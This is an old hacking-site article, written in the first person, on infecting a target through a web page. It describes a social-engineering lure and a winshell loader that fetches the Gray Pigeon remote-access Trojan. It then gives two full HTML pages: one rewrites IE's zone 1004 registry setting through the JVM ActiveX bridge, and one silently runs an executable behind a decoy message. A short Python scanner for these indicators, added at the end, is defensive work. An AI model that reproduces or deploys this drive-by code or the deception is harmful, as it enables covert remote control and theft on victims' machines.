Conventional methods of making a web Trojan - vulnerability warning - the black bar safety net

ID MYHACK58:6220053846
Type myhack58
Reporter Anonymous
Modified 2005-10-20T00:00:00


This morning, as soon as I got to school, a classmate told me his QQ had been stolen by someone! (Outrageous! Picking on my buddy, of all people.) So I told him: "Don't worry, I'll definitely get it back for you!" In truth I was not sure at all: anyone who can steal an OICQ account must have at least some security awareness. When I got home from school I opened my QQ and saw that the classmate's avatar had just lit up. I checked the IP, and it looked like the same city as me. Judging from the port number, my first guess was that this guy was in an Internet cafe (because it was not the default 4000, 4001 or 5000). I gave up the idea of breaking into his machine directly, because most Internet cafes here run Windows 98, and 98 is very hard to break into, so I decided to change approach. After 20 minutes of hard thinking I finally came up with a way (not to boast about my efficiency): get him to browse a web page and infect him with a Trojan that way. But there were three problems to solve first:

1. How to get the other party to browse the web page obediently.
2. The other party is on a LAN, so a conventional Trojan will certainly not work.
3. If the Trojan server end is too large, it is easily noticed.

The first problem is easily solved: just pretend to be an innocent MM or GG and play on his feelings. The second is not too hard either: use a reverse-connecting (bounce) Trojan. The third, however, is not so easy, because even the smallest bounce Trojans are 30-odd KB; if you put one on a web page for the other party to browse, a download box will certainly sit "swinging" on his screen for ages. But after my 20-odd minutes of thinking, I came up with the following solution:

1. Apply for some homepage space.
2. Configure the winshell 5.0 server end. You might ask: isn't this Trojan not a bounce type? Why use it? Don't worry, I chose it for two reasons.
First, its server end is very small, only about 5 KB. Second, it has a very useful feature. (See the part I circled in red in Figure 1. That is the useful feature I meant.) DownExec means: "when winshell runs, automatically download the executable file and run it." Url Address is the address of that executable file, and Destination Filename is the file name after download. So when the other party runs the winshell we configured, it silently goes off and downloads the real, huge bounce Trojan server end!


3. Add winshell to a web page, then upload the page, winshell and the bounce Trojan server end (named huigezi.exe; I used Gray Pigeon here) together to xxx.abc.com/. Then I used the "honey trap" to get the kid to browse my web page obediently. Figure 2 is the evidence!


What happened next I need not elaborate. As for how to embed the Trojan program in the web page, here I only describe a method I found online; study the rest yourself. The specific method is as follows: first open an HTML page which, through malicious HTML code, switches IE's security option "Download unsigned ActiveX controls" from the default "Disable" to "Enable", and then immediately open a second HTML file whose content downloads an unsigned ActiveX control, which is in essence the EXE file we want to execute. Save the following code as the file index.htm:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<script>
// Microsoft JVM applet used as a bridge from page script to COM objects
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
  try {
    // ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Shell
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); // Scripting.FileSystemObject
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); // WScript.Network
    a1.createInstance();
    Net = a1.GetObject();
    try {
      if (document.cookie.indexOf("Chg") == -1) {
        // Internet zone (3), policy 1004 "Download unsigned ActiveX controls": 0 = Enable
        Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
        var expdate = new Date((new Date()).getTime() + (1));
        document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      }
    } catch(e) {}
  } catch(e) {}
}
function init() { setTimeout("f()", 1000); }
init();
</script>

<script language="javascript">
<!-- Begin
function opencolortext(){
  window.open('http://xxx.abc.com/2.htm','colortext')
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

Next, produce the file 2.htm:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<script language=javascript>
// Build an OBJECT tag whose CODEBASE is the executable itself
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\" ";
run_exe+="CODEBASE=\"hacker.exe#version=1,1,1,1\">";
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">";
run_exe+="</OBJECT>";
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">Connecting to the forum, please do not close....<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

Here hacker.exe is the file we want to execute. The text "Connecting to the forum, please do not close...." is there purely to confuse the other party; change it to your own taste. Next, just upload index.htm, 2.htm and hacker.exe together to the same directory of the homepage and it is done! Summary: the advantage of this method is that even if the other party is on a LAN, we can still use a Trojan to get into his machine, and it is hard to discover. But the method also has its disadvantage: using two Trojans greatly increases the probability of being caught by antivirus. The other party, however, was in an Internet cafe, and most Internet cafes here do not install antivirus software, using a hard-disk restore card instead, and do not update IE. That my intrusion succeeded is partly to the cafe owner's credit!
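A scanner for the traces this two-page technique leaves in HTML (the JVM applet bridge, the scripting CLSIDs, the write to zone policy 1004, and an OBJECT whose CODEBASE is an .exe), as an added detection example that is not part of the original article. The samples are constructed to mirror the article's listings; the rule names and verdict thresholds are this example's own assumptions.

```python
"""Flag the two-page ActiveX drive-by pattern from the article (added example,
not the article's own code). Samples are constructed to mirror its listings;
rule names and verdict thresholds are this example's assumptions."""
import re

# Indicators taken from the article's listings (CLSIDs, zone key, CODEBASE).
RULES = [
    # Microsoft JVM applet used as a bridge from page script to any COM object
    ("ms_jvm_activex_bridge",
     re.compile(r"com\.ms\.activeX\.ActiveXComponent", re.I)),
    # WScript.Shell / FileSystemObject / WScript.Network created via setCLSID
    ("scripting_clsid",
     re.compile(r"setCLSID\(\s*[\"']\{(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
                r"|0D43FE01-F093-11CF-8940-00A0C9054228"
                r"|F935DC26-1CF0-11D0-ADB9-00C04FD58A0B)\}", re.I)),
    # Zone policy 1004 (download unsigned ActiveX) written as 0 = enabled
    ("zone_1004_enabled",
     re.compile(r"RegWrite\s*\(\s*[\"'][^\"']*Internet Settings\\+Zones\\+\d"
                r"\\+1004[\"']\s*,\s*0\b", re.I)),
    # OBJECT tag whose CODEBASE points straight at an .exe
    ("object_codebase_exe",
     re.compile(r"CODEBASE\s*=\s*\\?[\"'][^\"'>]*\.exe", re.I)),
]

def scan_html(html):
    """Return the indicator names present in one HTML document, in rule order."""
    return [name for name, rx in RULES if rx.search(html)]

def verdict(hits):
    """Chained indicators are the article's technique; a lone one needs a look."""
    if len(hits) >= 2:
        return "block"
    return "review" if hits else "clean"

# Constructed sample: the zone-lowering first page, condensed.
SAMPLE_DROPPER = r'''<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<script>
a1 = document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 0, "REG_DWORD");
setTimeout("window.open('http://xxx.abc.com/2.htm')", 1500);
</script>'''
# Constructed sample: the second page that references the executable.
SAMPLE_LOADER = r'''<script>run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"";
run_exe+="CODEBASE=\"hacker.exe#version=1,1,1,1\">";</script>'''
# Constructed benign page: a plug-in shipped as a .cab, no registry writes.
SAMPLE_BENIGN = '<OBJECT CODEBASE="https://xxx.abc.com/player.cab#version=9,0,0,0"></OBJECT>'
```

Run over a proxy cache or web root, the first page scores "block" on three chained indicators while the loader page alone only earns "review".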